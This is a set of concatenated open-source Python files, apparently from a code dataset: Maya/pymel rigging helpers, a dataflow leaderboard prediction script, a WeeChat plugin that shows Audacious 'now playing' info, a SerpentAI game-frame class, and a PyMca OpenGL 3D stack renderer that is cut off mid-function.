return self[-1] if len(self) > 0 else None
@property
def chain(self):
return self
def duplicate(self):
# Hack - Convert self into list even if self is a list to prevent duplicate self parameter in pymel.duplicate
new_chain = pymel.duplicate(list(self), renameChildren=True, parentOnly=True)
return PyNodeChain(new_chain)
def setParent(self, new_parent, **kwargs):
for node in self:
if node != new_parent and node.getParent() != new_parent:
node.setParent(new_parent, **kwargs)
# todo: convert to property?
def length(self):
length = 0
for i in range(len(self) - 1):
head = self[i]
tail = self[i + 1]
length += distance_between_nodes(head, tail)
return length
# get the first pynode that have the attr
def __getattr__(self, key):
logging.warning("Searching unknow attribute {key} in {self}", key=key, self=self)
first_node = next((node for node in self.__dict__['_list'] if hasattr(node, key)), None)
if first_node is not None:
return getattr(first_node, key)
raise AttributeError
# set all the pynodes that have the attr
def __setattr__(self, key, value):
for node in self:
try:
setattr(node, key, value)
except Exception, e:
logging.error(str(e))
def duplicate_chain(chain):
new_chain = pymel.duplicate(chain, renameChildren=True, parentOnly=True)
return PyNodeChain(new_chain)
def get_num_parents(obj):
num_parents = -1
while obj is not None:
obj = obj.getParent()
num_parents += 1
return num_parents
def get_chains_from_objs(objs):
"""
    Take an arbitrary collection of joints and sort them into hierarchies represented by lists.
"""
chains = []
objs = sorted(objs, key=get_num_parents)
for obj in objs:
parent = obj.getParent()
if parent not in objs:
chains.append([obj])
else:
for chain in chains:
if parent in chain:
chain.append(obj)
return [PyNodeChain(chain) for chain in chains]
def iter_parents(obj):
while obj.getParent() is not None:
obj = obj.getParent()
yield obj
def get_parents(obj):
return list(iter_parents(obj))
'''
parents = []
while obj.getParent() is not None:
parent = obj.getParent()
parents.append(parent)
obj = parent
return parents
'''
def get_common_parents(objs):
"""
Return the first parent that all provided objects share.
:param objs: A list of pymel.PyNode instances.
:return: A pymel.PyNode instance.
"""
parent_sets = set()
for jnt in objs:
parent_set = set(get_parents(jnt))
if not parent_sets:
parent_sets = parent_set
else:
parent_sets &= parent_set
result = next(iter(reversed(sorted(parent_sets, key=get_num_parents))), None)
if result and result in objs:
result = result.getParent()
return result
class Tree(object):
__slots__ = ('val', 'children', 'parent')
def __init__(self, val):
self.val = val
self.children = []
self.parent = None
def append(self, tree):
self.children.append(tree)
tree.parent = self
def __repr__(self):
return '<Tree {0}>'.format(self.val)
def get_tree_from_objs(objs, sort=False):
"""
Sort all provided objects in a tree fashion.
Support missing objects between hierarchy.
Note that tree root value will always be None, representing the root node.
"""
dagpaths = sorted([obj.fullPath() for obj in objs])
root = Tree(None)
def dag_is_child_of(dag_parent, dag_child):
return dag_child.startswith(dag_parent + '|')
last_knot = root
for dagpath in dagpaths:
knot = Tree(dagpath)
# Resolve the new knot parent
p = last_knot
while not (p.val is None or dag_is_child_of(p.val, dagpath)):
p = p.parent
p.append(knot)
# Save the last knot, since we are iterating in alphabetical order,
# we can assume that the next knot parent can be found using this knot.
last_knot = knot
return root
#
# ls() reimplementations
#
def ls(*args, **kwargs):
return PyNodeChain(pymel.ls(*args, **kwargs))
# Wrapper for pymel.ls that return only objects without parents.
def ls_root(*args, **kwargs):
# TODO: Better finding of the root joint
return PyNodeChain(filter(lambda x: x.getParent() is None or type(x.getParent()) != pymel.nt.Joint,
iter(pymel.ls(*args, **kwargs))))
def ls_root_anms(pattern='anm*', **kwargs):
return ls_root(pattern, type='transform', **kwargs)
def ls_root_geos(pattern='geo*', **kwargs):
return ls_root(pattern, type='transform', **kwargs)
def ls_root_rigs(pattern='rig*', **kwargs):
return ls_root(pattern, type='transform', **kwargs)
def ls_root_jnts(pattern='jnt*', **kwargs):
return ls_root(pattern, type='transform', **kwargs)
#
# isinstance() reimplementation
#
# Class check for transform PyNodes
def isinstance_of_transform(obj, cls=pymel.nodetypes.Transform):
return isinstance(obj, cls)
# Class check for shape PyNodes
def isinstance_of_shape(obj, cls=pymel.nodetypes.Shape):
if isinstance(obj, pymel.nodetypes.Transform):
return any((shape for shape in obj.getShapes() if isinstance(shape, cls)))
elif isinstance(obj, pymel.nodetypes.Shape):
return isinstance(obj, cls)
def create_zero_grp(obj):
zero_grp = pymel.createNode('transform')
new_name = obj.name() + '_' + 'zero_grp'
zero_grp.rename(new_name)
# Note: Removed for performance
zero_grp.setMatrix(obj.getMatrix(worldSpace=True))
parent = obj.getParent()
if parent:
zero_grp.setParent(parent)
obj.setParent(zero_grp)
return zero_grp
def zero_out_objs(objs):
for o in objs:
create_zero_grp(o)
#
# pymel.datatypes extensions.
#
class Segment(object):
"""
In Maya there's no class to represent a segment.
This is the pymel.datatypes.Segment I've always wanted.
"""
def __init__(self, pos_s, pos_e):
self.pos_s = pos_s
self.pos_e = pos_e
# self.pos_s = numpy.array(pos_s.x, pos_s.y, pos_s.z)
# self.pos_e = numpy.array(pos_e.x, pos_e.y, pos_e.z)
def closest_point(self, p):
"""
http://stackoverflow.com/questions/3120357/get-closest-point-to-a-line
"""
a = self.pos_s
b = self.pos_e
a_to_p = p - a
a_to_b = b - a
ab_length = a_to_b.length()
ap_length = a_to_p.length()
a_to_p_norm = a_to_p.normal()
a_to_b_norm = a_to_b.normal()
atp_dot_atb = a_to_p_norm * (a_to_b_norm) # dot product
dist_norm = atp_dot_atb * ap_length / ab_length
return pymel.datatypes.Vector(
a.x + a_to_b.x * dist_norm,
a.y + a_to_b.y * dist_norm,
a.z + a_to_b.z * dist_norm
)
def closest_point_normalized_distance(self, p, epsilon=0.001):
"""
Same things as .closest_point but only return the distance relative from the length of a to b.
Available for optimisation purpose.
"""
a = self.pos_s
b = self.pos_e
a_to_p = p - a
a_to_b = b - a
ab_length = a_to_b.length()
ap_length = a_to_p.length()
a_to_p_norm = a_to_p.normal()
a_to_b_norm = a_to_b.normal()
atp_dot_atb = a_to_p_norm * a_to_b_norm
return (atp_dot_atb * ap_length / ab_length) if abs(ab_length) > epsilon else 0.0
class SegmentCollection(object):
def __init__(self, segments=None):
if segments is None:
segments = []
self.segments = segments
self.knots = [segment.pos_s for segment in self.segments]
self.knots.append(self.segments[-1].pos_e)
def closest_segment(self, pos):
bound_min = -0.000000000001 # Damn float imprecision
bound_max = 1.0000000000001 # Damn float imprecision
num_segments = len(self.segments)
for i, segment in enumerate(self.segments):
distance_normalized = segment.closest_point_normalized_distance(pos)
if bound_min <= distance_normalized <= bound_max:
return segment, distance_normalized
elif i == 0 and distance_normalized < bound_min: # Handle out-of-bound
return segment, 0.0
elif i == (num_segments - 1) and distance_normalized > bound_max: # Handle out-of-bound
return segment, 1.0
raise Exception("Can't resolve segment for {0}".format(pos))
def closest_segment_index(self, pos):
closest_segment, ratio = self.closest_segment(pos)
index = self.segments.index(closest_segment)
return index, ratio
def get_knot_weights(self, dropoff=1.0, normalize=True):
num_knots = len(self.knots)
knots_weights = []
for i, knot in enumerate(self.knots):
if i == 0:
weights = [0] * num_knots
weights[0] = 1.0
elif i == (num_knots - 1):
weights = [0] * num_knots
weights[-1] = 1.0
else:
weights = []
total_weight = 0.0
for j in range(num_knots):
distance = abs(j - i)
weight = max(0, 1.0 - (distance / dropoff))
total_weight += weight
weights.append(weight)
weights = [weight / total_weight for weight in weights]
knots_weights.append(weights)
return knots_weights
'''
def get_weights(self, pos, dropoff=1.0, normalize=True):
# Compute the 'SegmentCollection' relative ratio and return the weight for each knots.
closest_segment, relative_ratio = self.closest_segment(pos)
index = self.segments.index(closest_segment)
absolute_ratio = relative_ratio + index
weights = []
total_weights = 0.0
for segment_ratio in range(len(self.knots)):
#segment_ratio += 0.5 # center of the joint
#print segment_ratio, absolute_ratio
distance = abs(segment_ratio - absolute_ratio)
weight = max(0, 1.0-(distance/dropoff))
# Apply cubic interpolation for greater results.
#weight = interp_cubic(weight)
total_weights += weight
weights.append(weight)
if normalize:
weights = [weight / total_weights for weight in weights]
return weights
'''
@classmethod
def from_transforms(cls, objs):
segments = []
num_objs = len(objs)
for i in range(num_objs - 1):
obj_s = objs[i]
obj_e = objs[i + 1]
mfn_transform_s = obj_s.__apimfn__()
mfn_transform_e = obj_e.__apimfn__()
pos_s = OpenMaya.MVector(mfn_transform_s.getTranslation(OpenMaya.MSpace.kWorld))
pos_e = OpenMaya.MVector(mfn_transform_e.getTranslation(OpenMaya.MSpace.kWorld))
segment = Segment(pos_s, pos_e)
segments.append(segment)
return cls(segments)
@classmethod
def from_positions(cls, positions):
segments = []
num_positions = len(positions)
for i in range(num_positions - 1):
pos_s = positions[i]
pos_e = positions[i + 1]
segment = Segment(pos_s, pos_e)
segments.append(segment)
return cls(segments)
def get_rotation_from_matrix(tm):
"""
Bypass pymel bug
see https://github.com/LumaPictures/pymel/issues/355
"""
return pymel.datatypes.TransformationMatrix(tm).rotate
def makeIdentity_safe(obj, translate=False, rotate=False, scale=False, apply=False, **kwargs):
"""
Extended pymel.makeIdentity method that won't crash for idiotic reasons.
"""
from . import libAttr
affected_attrs = []
# Ensure the shape don't have any extra transformation.
if apply:
if translate:
libAttr.unlock_translation(obj)
affected_attrs.extend([
obj.translate, obj.translateX, obj.translateY, obj.translateZ
])
if rotate:
libAttr.unlock_rotation(obj)
affected_attrs.extend([
obj.rotate, obj.rotateX, obj.rotateY, obj.rotateZ
])
if scale:
libAttr.unlock_scale(obj)
affected_attrs.extend([
obj.scale, obj.scaleX, obj.scaleY, obj.scaleZ
])
    # makeIdentity will fail if attributes are connected...
with libAttr.context_disconnected_attrs(affected_attrs, hold_inputs=True, hold_outputs=False):
pymel.makeIdentity(obj, apply=apply, translate=translate, rotate=rotate, scale=scale, **kwargs)
| mit | 3,718,975,997,942,480,400 | 29.17161 | 117 | 0.59118 | false |
microsoft/task_oriented_dialogue_as_dataflow_synthesis | src/dataflow/leaderboard/predict.py | 1 | 2613 | # Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
"""
Semantic Machines\N{TRADE MARK SIGN} software.
Creates the prediction files from onmt_translate output for the leaderboard.
"""
import argparse
from typing import List
import jsons
from more_itertools import chunked
from dataflow.core.dialogue import TurnId
from dataflow.core.io import save_jsonl_file
from dataflow.core.turn_prediction import TurnPrediction
def build_prediction_report_datum(
datum_id_line: str, src_line: str, nbest_lines: List[str],
) -> TurnPrediction:
datum_id = jsons.loads(datum_id_line.strip(), TurnId)
return TurnPrediction(
datum_id=datum_id,
user_utterance=src_line.strip(),
lispress=nbest_lines[0].strip(),
)
def create_onmt_prediction_report(
datum_id_jsonl: str, src_txt: str, ref_txt: str, nbest_txt: str, nbest: int,
):
prediction_report = [
build_prediction_report_datum(
datum_id_line=datum_id_line, src_line=src_line, nbest_lines=nbest_lines,
)
for datum_id_line, src_line, ref_line, nbest_lines in zip(
open(datum_id_jsonl),
open(src_txt),
open(ref_txt),
chunked(open(nbest_txt), nbest),
)
]
save_jsonl_file(prediction_report, "predictions.jsonl")
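    # Added note: zip() above pairs each datum id / source / reference line with
    # a block of `nbest` hypothesis lines grouped by more_itertools.chunked;
    # build_prediction_report_datum keeps only the first hypothesis of each block.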
def main(
datum_id_jsonl: str, src_txt: str, ref_txt: str, nbest_txt: str, nbest: int,
) -> None:
"""Creates 1-best predictions and saves them to files."""
create_onmt_prediction_report(
datum_id_jsonl=datum_id_jsonl,
src_txt=src_txt,
ref_txt=ref_txt,
nbest_txt=nbest_txt,
nbest=nbest,
)
def add_arguments(argument_parser: argparse.ArgumentParser) -> None:
argument_parser.add_argument("--datum_id_jsonl", help="datum ID file")
argument_parser.add_argument("--src_txt", help="source sequence file")
argument_parser.add_argument("--ref_txt", help="target sequence reference file")
argument_parser.add_argument("--nbest_txt", help="onmt_translate output file")
argument_parser.add_argument("--nbest", type=int, help="number of hypos per datum")
if __name__ == "__main__":
cmdline_parser = argparse.ArgumentParser(
description=__doc__, formatter_class=argparse.RawTextHelpFormatter
)
add_arguments(cmdline_parser)
args = cmdline_parser.parse_args()
print("Semantic Machines\N{TRADE MARK SIGN} software.")
main(
datum_id_jsonl=args.datum_id_jsonl,
src_txt=args.src_txt,
ref_txt=args.ref_txt,
nbest_txt=args.nbest_txt,
nbest=args.nbest,
)
| mit | -9,164,045,024,337,558,000 | 30.865854 | 87 | 0.66284 | false |
nashgul/weechat | audacious_script/audacious.py | 1 | 3067 | # audacious now playing for weechat
# nashgul <[email protected]>
# version 0.1
# white => "00", black => "01", darkblue => "02", darkgreen => "03", lightred => "04", darkred => "05", magenta => "06", orange => "07", yellow => "08", lightgreen => "09", cyan => "10", lightcyan => "11", lightblue => "12", lightmagenta => "13", gray => "14", lightgray => "15"
import weechat
import subprocess
weechat.register("audacious_np", "nashgul", "0.01", "GPL2", "now playing for audacious (usage: /audacious)", "", "")
name = 'audacious'
description = 'show now playing for audacious'
hook = weechat.hook_command(name, description, '', '', '', 'now_playing', '')
def get_info_array():
info_list = (['audtool current-song',
'audtool current-song-length',
'audtool current-song-output-length',
'audtool current-song-bitrate-kbps',
'audtool current-song-filename'])
results = []
for x in info_list:
temporal = subprocess.Popen(x, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
b = temporal.stdout.read().splitlines()
results.append(b[0])
return results
def now_playing(datos, channel, args):
colors = {
'white' : '00', 'black' : '01', 'darkblue' : '02', 'darkgreen' : '03',
'lightred' : '04', 'darkred' : '05', 'magenta' : '06', 'orange' : '07',
'yellow' : '08', 'lightgreen' : '09', 'cyan' : '10', 'lightcyan' : '11',
'lightblue' : '12', 'lightmagenta' : '13', 'gray' : '14', 'lightgray' : '15'
}
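    # Added note: the strings built below use mIRC-style formatting codes --
    # '\x03' followed by a two-digit number from the table above starts a
    # colour, and '\x0f' resets formatting.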
info_array = get_info_array()
message_color = "%s" % colors['darkblue']
message = u'\x03' + message_color + 'esta reproduciendo' + u'\x0f'
song_color = "%s" % colors['lightred']
song = u'\x03' + song_color + info_array[0] + u'\x0f'
song_filename_color = "%s" % colors['lightred']
song_filename = u'\x03' + song_filename_color + info_array[4] + u'\x0f'
brackets_color = "%s" % colors['yellow']
bracket_1 = u'\x03' + brackets_color + '[' + u'\x0f'
bracket_2 = u'\x03' + brackets_color + ']' + u'\x0f'
hyphen_color = "%s" % colors['yellow']
hyphen = u'\x03' + hyphen_color + ' - ' + u'\x0f'
at_color = "%s" % colors['yellow']
at_sym = u'\x03' + at_color + '@' + u'\x0f'
output_length_color = "%s" % colors['lightblue']
output_length = u'\x03' + output_length_color + info_array[2] + u'\x0f'
length = ''
if info_array[1] != '0:00':
length_color = "%s" % colors['lightblue']
length = u'\x03' + length_color + hyphen + ' ' + info_array[1] + ' ' + u'\x0f'
bitrate_color = "%s" % colors['lightmagenta']
bitrate = u'\x03' + bitrate_color + info_array[3] + ' kbps' + u'\x0f'
string = "%s %s %s%s %s %s" %(bracket_1, output_length, length, at_sym, bitrate, bracket_2)
source = ''
if song_filename.lower().startswith('http'):
source = song_filename
output_string = "%s: %s %s %s" %(message, source, song, string)
weechat.command(channel, "/me %s" % (output_string))
return weechat.WEECHAT_RC_OK
| gpl-2.0 | -6,693,482,823,102,077,000 | 45.469697 | 278 | 0.573525 | false |
SerpentAI/SerpentAI | serpent/game_frame.py | 1 | 5346 | import skimage.color
import skimage.measure
import skimage.transform
import skimage.filters
import skimage.morphology
import numpy as np
import io
from PIL import Image
class GameFrameError(BaseException):
pass
class GameFrame:
def __init__(self, frame_data, frame_variants=None, timestamp=None, **kwargs):
if isinstance(frame_data, bytes):
self.frame_bytes = frame_data
self.frame_array = None
elif isinstance(frame_data, np.ndarray):
self.frame_bytes = None
self.frame_array = frame_data
self.frame_variants = frame_variants or dict()
self.timestamp = timestamp
self.offset_x = kwargs.get("offset_x") or 0
self.offset_y = kwargs.get("offset_y") or 0
self.resize_order = kwargs.get("resize_order") or 1
@property
def frame(self):
return self.frame_array if self.frame_array is not None else self.frame_bytes
@property
def half_resolution_frame(self):
""" A quarter-sized version of the frame (half-width, half-height)"""
if "half" not in self.frame_variants:
self.frame_variants["half"] = self._to_half_resolution()
return self.frame_variants["half"]
@property
def quarter_resolution_frame(self):
""" A sixteenth-sized version of the frame (quarter-width, quarter-height)"""
if "quarter" not in self.frame_variants:
self.frame_variants["quarter"] = self._to_quarter_resolution()
return self.frame_variants["quarter"]
@property
def eighth_resolution_frame(self):
""" A 1/32-sized version of the frame (eighth-width, eighth-height)"""
if "eighth" not in self.frame_variants:
self.frame_variants["eighth"] = self._to_eighth_resolution()
return self.frame_variants["eighth"]
@property
def eighth_resolution_grayscale_frame(self):
""" A 1/32-sized, grayscale version of the frame (eighth-width, eighth-height)"""
if "eighth_grayscale" not in self.frame_variants:
self.frame_variants["eighth_grayscale"] = self._to_eighth_grayscale_resolution()
return self.frame_variants["eighth_grayscale"]
@property
def grayscale_frame(self):
""" A full-size grayscale version of the frame"""
if "grayscale" not in self.frame_variants:
self.frame_variants["grayscale"] = self._to_grayscale()
return self.frame_variants["grayscale"]
@property
def ssim_frame(self):
""" A 100x100 grayscale frame to be used for SSIM"""
if "ssim" not in self.frame_variants:
self.frame_variants["ssim"] = self._to_ssim()
return self.frame_variants["ssim"]
@property
def top_color(self):
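        # Added note: returns the most frequent RGB value in the eighth-resolution
        # frame; np.unique(..., return_counts=True) counts identical pixel rows and
        # argsort picks the colour with the highest count.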
height, width, channels = self.eighth_resolution_frame.shape
values, counts = np.unique(self.eighth_resolution_frame.reshape(width * height, channels), axis=0, return_counts=True)
return [int(i) for i in values[np.argsort(counts)[::-1][0]]]
def compare_ssim(self, previous_game_frame):
return skimage.measure.compare_ssim(previous_game_frame.ssim_frame, self.ssim_frame)
def difference(self, previous_game_frame):
current = skimage.filters.gaussian(self.grayscale_frame, 8)
previous = skimage.filters.gaussian(previous_game_frame.grayscale_frame, 8)
return current - previous
def to_pil(self):
return Image.fromarray(self.frame)
def to_png_bytes(self):
pil_frame = Image.fromarray(skimage.util.img_as_ubyte(self.frame))
if len(self.frame.shape) == 3:
pil_frame = pil_frame.convert("RGB")
png_frame = io.BytesIO()
pil_frame.save(png_frame, format="PNG", compress_level=3)
png_frame.seek(0)
return png_frame.read()
# TODO: Refactor Fraction of Resolution Frames...
def _to_half_resolution(self):
shape = (
self.frame_array.shape[0] // 2,
self.frame_array.shape[1] // 2
)
return np.array(skimage.transform.resize(self.frame_array, shape, mode="reflect", order=self.resize_order) * 255, dtype="uint8")
def _to_quarter_resolution(self):
shape = (
self.frame_array.shape[0] // 4,
self.frame_array.shape[1] // 4
)
return np.array(skimage.transform.resize(self.frame_array, shape, mode="reflect", order=self.resize_order) * 255, dtype="uint8")
def _to_eighth_resolution(self):
shape = (
self.frame_array.shape[0] // 8,
self.frame_array.shape[1] // 8
)
return np.array(skimage.transform.resize(self.frame_array, shape, mode="reflect", order=self.resize_order) * 255, dtype="uint8")
def _to_eighth_grayscale_resolution(self):
shape = (
self.frame_array.shape[0] // 8,
self.frame_array.shape[1] // 8
)
return np.array(skimage.transform.resize(self.grayscale_frame, shape, mode="reflect", order=self.resize_order) * 255, dtype="uint8")
def _to_grayscale(self):
return np.array(skimage.color.rgb2gray(self.frame_array) * 255, dtype="uint8")
def _to_ssim(self):
grayscale = self.grayscale_frame
return skimage.transform.resize(grayscale, (100, 100), mode="reflect", order=0)
| mit | -799,488,949,246,343,400 | 31.204819 | 140 | 0.633558 | false |
tonnrueter/pymca_devel | PyMca/Object3D/Object3DPlugins/Object3DStack.py | 1 | 24743 | import os
try:
import OpenGL.GL as GL
import OpenGL.GLU as GLU
except ImportError:
raise ImportError, "OpenGL must be installed to use these functionalities"
import numpy
try:
from PyMca import spslut
except:
import spslut
try:
from PyMca.Object3D import Object3DFileDialogs
from PyMca.Object3D import Object3DBase
except ImportError:
from Object3D import Object3DFileDialogs
from Object3D import Object3DBase
try:
from PyMca.Object3D import Object3DCTools
except ImportError:
try:
from Object3D import Object3DCTools
except:
import Object3DCTools
import Object3DMeshConfig
qt = Object3DMeshConfig.qt
import weakref
#import buffers
DEBUG = 0
import time
DRAW_MODES = ['NONE',
'POINT',
'WIRE',
'SURFACE',
'LIGHT',
'POINT_SELECTION']
COLORMAPLIST = [spslut.GREYSCALE, spslut.REVERSEGREY, spslut.TEMP,
spslut.RED, spslut.GREEN, spslut.BLUE, spslut.MANY]
class Object3DStack(Object3DBase.Object3D):
def __init__(self, name = "3D-Array"):
Object3DBase.Object3D.__init__(self, name)
self._alpha = 255
self.drawListDict = {}
self._forceListCalculation = {}
self.vertices = None
self.vertexColors = None
self.vertexSelectionColors = None
self._selected = False
self._vertexSelectionMode = False
self.drawMode = 'POINT'
self.__isosurfacesDict = {}
for i in range(5):
self.__isosurfacesDict[i] = {}
self.__isosurfacesDict[i]['list'] = 0
self.__isosurfacesDict[i]['value'] = 0
self.__isosurfacesDict[i]['color'] = 'red'
self.__isosurfacesDict[i]['r'] = 0xFF
self.__isosurfacesDict[i]['g'] = 0
self.__isosurfacesDict[i]['b'] = 0
self.__isosurfacesDict[i]['a'] = 0xFF
self._configuration['common']['supportedmodes'] = [1, 1, 1, 1]
self._configuration['common']['mode'] = 1
#centered on XY plane and on Z
self._configuration['common']['anchor'] = [2, 2, 2]
#self._verticesBufferObject = None
#self._vertexColorBufferObject = None
#self._vertexSelectionColorBufferObject = None
def initPrivateConfiguration(self, name):
"""
Specific configuration
"""
self._configuration['private'] = {}
if self._privateConfigurationWidget is None:
self._privateConfigurationWidget = Object3DMeshConfig.\
Object3DMeshConfig(None, name)
self._configuration['private']['widget'] = weakref.proxy(self._privateConfigurationWidget)
self._configuration['private']['colorfilter'] = 1
self._configuration['private']['isosurfaces'] = [[1, 20, 'green', 0, 0xFF, 0, 0xFF]] #green
#self._configuration['private']['isosurfaces'] = [[1, 10, None, 0, 0, 0, 0xFF]] #auto
self._configuration['private']['useminmax'] = [0, 100, 200]
self._configuration['private']['infolabel'] = "Object3DStack %s" % name
def __del__(self):
for key in self.drawListDict.keys():
if key.upper() != "NONE":
if self.drawListDict[key] > 0:
GL.glDeleteLists(self.drawListDict[key], 1)
for key in self.__isosurfacesDict.keys():
if self.__isosurfacesDict[key]['list'] > 0:
GL.glDeleteLists(self.__isosurfacesDict[key]['list'], 1)
try:
Object3DBase.Object3D.__del__(self)
except AttributeError:
pass
def setConfiguration(self, ddict):
old_alpha = 1.0 - self._configuration['common']['transparency']
Object3DBase.Object3D.setConfiguration(self, ddict)
new_alpha = 1.0 - self._configuration['common']['transparency']
if (new_alpha != old_alpha):
self._setAlpha(new_alpha)
self.drawMode = DRAW_MODES[self._configuration['common']['mode']]
if ddict['common'].has_key('event'):
if ddict['common']['event'] == 'ColormapChanged':
self.getColors()
def _setAlpha(self, alpha):
if alpha < 0:
alpha = 0
elif alpha >= 1.0:
alpha = 255
else:
self._alpha = int(255 * alpha)
if self.vertexColors is None:
return
self.vertexColors[:, 3] = self._alpha
def setData(self, *args, **kw):
return self.setStack(*args, **kw)
def setStack(self, data, x=None, y=None, z=None, xyz=None):
"""
        setStack(data, x=None, y=None, z=None, xyz=None)
data is the array of vertex values.
xyz = [x,y,z] are three arrays with the grid coordinates
"""
if hasattr(data, "info") and hasattr(data, "data"):
#It is an actual stack
self._actualStack = True
self.values = data.data[:]
else:
self._actualStack = False
self.values = data[:]
if self.values.dtype != numpy.float32:
print("WARNING: Converting to float32")
self.values = self.values.astype(numpy.float32)
if (x is None) and (y is None) and (xyz is None):
xsize, ysize, zsize = self.values.shape
self._x = numpy.arange(xsize).astype(numpy.float32)
self._y = numpy.arange(ysize).astype(numpy.float32)
self._z = numpy.arange(zsize).astype(numpy.float32)
if self._actualStack:
xCal = map(float, eval(data.info.get('CAxis0CalibrationParameters', '[0., 1.0, 0.0]')))
yCal = map(float, eval(data.info.get('CAxis1CalibrationParameters', '[0., 1.0, 0.0]')))
zCal = map(float, eval(data.info.get('CAxis2CalibrationParameters', '[0., 1.0, 0.0]')))
self._x[:] = xCal[0] + self._x * (xCal[1] + xCal[2] * self._x)
self._y[:] = yCal[0] + self._y * (yCal[1] + yCal[2] * self._y)
self._z[:] = zCal[0] + self._z * (zCal[1] + zCal[2] * self._z)
self.xSize, self.ySize, self.zSize = xsize, ysize, zsize
elif xyz is not None:
self.xSize, self.ySize, self.zSize = self.values.shape
self._x[:] = xyz[0][:]
self._y[:] = xyz[1][:]
self._z[:] = xyz[2][:]
elif (x is not None) and (y is not None):
#regular mesh
self._x = numpy.array(x).astype(numpy.float32)
self._y = numpy.array(y).astype(numpy.float32)
self._x.shape = -1, 1
self._y.shape = -1, 1
self.xSize = self._x.shape[0]
self.ySize = self._y.shape[0]
if z is not None:
self._z = numpy.array(z).astype(numpy.float32)
if len(self._z.shape) == 0:
#assume just a number
self.zSize = 1
else:
self._z.shape = -1, 1
self.zSize = self._z.shape[0]
else:
a=1
for v in self.values.shape:
a *= v
zsize = int(a/(self.xSize * self.ySize))
self._z = numpy.arange(zsize).astype(numpy.float32)
self.zSize = zsize
else:
raise ValueError, "Unhandled case"
old_shape = self.values.shape
self.nVertices = self.xSize * self.ySize * self.zSize
self.values.shape = self.nVertices, 1
self.getColors()
self._obtainLimits()
#restore original shape
self.values.shape = old_shape
def getColors(self):
old_shape = self.values.shape
self.values.shape = -1, 1
self._configuration['common']['colormap'][4]=self.values.min()
self._configuration['common']['colormap'][5]=self.values.max()
colormap = self._configuration['common']['colormap']
(self.vertexColors,size,minmax)= spslut.transform(self.values,
(1,0),
(colormap[6],3.0),
"RGBX",
COLORMAPLIST[int(str(colormap[0]))],
colormap[1],
(colormap[2], colormap[3]),
(0, 255),1)
self.values.shape = old_shape
self.vertexColors.shape = self.nVertices, 4
self.vertexColors[:, 3] = self._alpha
#selection colors
# if I have more than pow(2, 24) vertices
# the vertex with number pow(2, 24) will never be selected
return
i = numpy.arange(self.nVertices)
self.vertexSelectionColors = numpy.zeros((self.nVertices,4),
numpy.uint8)
self.vertexSelectionColors[:,0] = (i & 255)
self.vertexSelectionColors[:,1] = ((i >> 8) & 255)
self.vertexSelectionColors[:,2] = ((i >> 16) & 255)
self.vertexSelectionColors[:,3] = 255 - (i >> 24)
def _obtainLimits(self):
xmin, ymin, zmin = self._x.min(), self._y.min(), self._z.min()
xmax, ymax, zmax = self._x.max(), self._y.max(), self._z.max()
self.setLimits(xmin, ymin, zmin, xmax, ymax, zmax)
def drawObject(self):
if self.values is None:
return
if DEBUG:
t0=time.time()
GL.glPushAttrib(GL.GL_ALL_ATTRIB_BITS)
GL.glShadeModel(GL.GL_FLAT)
if self.drawMode == 'NONE':
pass
elif (GL.glGetIntegerv(GL.GL_RENDER_MODE) == GL.GL_SELECT) or \
self._vertexSelectionMode:
self.buildPointList(selection=True)
elif self.drawMode == 'POINT':
self.buildPointList(selection=False)
#self.buildPointListNEW(selection=False)
elif self.drawMode == 'POINT_SELECTION':
self.buildPointList(selection=True)
elif self.drawMode in ['LINES', 'WIRE']:
Object3DCTools.draw3DGridLines(self._x,
self._y,
self._z,
self.vertexColors,
self.values,
self._configuration['private']['colorfilter'],
self._configuration['private']['useminmax'])
elif self.drawMode == "SURFACE":
flag = 1
i = 0
for use, value, label, cr, cg, cb, ca in self._configuration['private']['isosurfaces']:
color = (cr, cg, cb, ca)
if None in color:
color = None
if use:
flag = 0
GL.glEnable(GL.GL_LIGHTING)
if color is not None:
GL.glColor4ub(color[0],
color[1],
color[2],
self._alpha)
colorflag = False
if self.__isosurfacesDict[i]['list'] > 0:
if self.__isosurfacesDict[i]['color'] == color:
colorflag = True
elif (self.__isosurfacesDict[i]['color'] != None) and\
(color != None):
colorflag = True
if self.__isosurfacesDict[i]['list'] > 0:
if (self.__isosurfacesDict[i]['value'] == value) and\
colorflag:
GL.glCallList(self.__isosurfacesDict[i]['list'])
i += 1
continue
GL.glDeleteLists(self.__isosurfacesDict[i]['list'],
1)
self.__isosurfacesDict[i]['value']= value
self.__isosurfacesDict[i]['color']= color
self.__isosurfacesDict[i]['list'] = GL.glGenLists(1)
GL.glNewList(self.__isosurfacesDict[i]['list'],
GL.GL_COMPILE)
GL.glBegin(GL.GL_TRIANGLES)
Object3DCTools.gridMarchingCubes(self._x, self._y, self._z, self.values, value, color, (1, 1, 1), 1)
#Object3DCTools.gridMarchingCubes(self._x, self._y, self._z, self.values, value, None, (1, 1, 1), 1)
GL.glEnd()
GL.glEndList()
GL.glCallList(self.__isosurfacesDict[i]['list'])
GL.glDisable(GL.GL_LIGHTING)
i += 1
if flag:
#This is useless, only isosurfaces makes sense
Object3DCTools.draw3DGridQuads(self._x,
self._y,
self._z,
self.vertexColors,
self.values,
self._configuration['private']['colorfilter'],
self._configuration['private']['useminmax'])
else:
print "UNSUPPORTED MODE"
GL.glPopAttrib()
if DEBUG:
print "Drawing takes ", time.time() - t0
def _getVertexSelectionColors(self):
self.vertexSelectionColors = numpy.zeros((self.nVertices,4),
numpy.uint8)
#split the color generation in two blocks
#to reduce the amount of memory needed
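        # Added note: each vertex index is packed into an RGBA colour so a picked
        # pixel can be decoded back to a vertex id, e.g. index 0x01020304 becomes
        # (r, g, b, a) = (0x04, 0x03, 0x02, 255 - 0x01).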
half = int(self.nVertices/2)
i = numpy.arange(0, half)
self.vertexSelectionColors[:half,0] = (i & 255)
self.vertexSelectionColors[:half,1] = ((i >> 8) & 255)
self.vertexSelectionColors[:half,2] = ((i >> 16) & 255)
self.vertexSelectionColors[:half,3] = 255 - (i >> 24)
i = numpy.arange(half, self.nVertices)
self.vertexSelectionColors[half:,0] = (i & 255)
self.vertexSelectionColors[half:,1] = ((i >> 8) & 255)
self.vertexSelectionColors[half:,2] = ((i >> 16) & 255)
self.vertexSelectionColors[half:,3] = 255 - (i >> 24)
def isVertexSelectionModeSupported(self):
return True
def buildPointList(self, selection=False):
if selection:
if self.vertexSelectionColors is None:
self._getVertexSelectionColors()
if self._configuration['private']['colorfilter']:
tinyNumber = 1.0e-10
minValue = self._configuration['common']['colormap'][2] + tinyNumber
